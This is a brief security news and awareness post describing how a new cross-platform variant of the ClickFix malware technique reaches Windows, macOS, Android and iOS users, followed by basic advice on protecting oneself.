"Watch Out! "ClickFix Returns Stronger: Cross-Platform Malware That Needs No Clicks to Strike"

Cybersecurity experts from c/side have uncovered a newly enhanced version of the ClickFix malware technique. Originally designed to exploit Windows systems, this method has now evolved to attack macOS, Android, and iOS devices as well.

The attack begins on a compromised website, where malicious JavaScript code is injected. When users interact with certain elements on the page, they're redirected to a fake URL shortener page. This page instructs them to copy and paste a link into their browser, which initiates a secondary redirection to a malicious download page.

The attack varies by operating system:

• macOS users are prompted to execute a terminal command that downloads and runs a malicious shell script—already recognized by multiple antivirus engines.
  
  
• Android and iOS users face a more dangerous threat: a drive-by download. Simply visiting the infected site causes a .TAR file containing malware to be downloaded—without any user interaction.

This shift marks a significant escalation in the threat’s reach and complexity. What started as a Windows-only threat has now become a cross-platform attack, showing how cybercriminals are adapting quickly to compromise a wider range of devices

How to Protect Yourself:
- Avoid clicking on unknown links or ads
- Never paste commands from untrusted websites into your Terminal or command prompt
- Use up-to-date antivirus software with real-time protection
- Keep your software and operating system regularly updated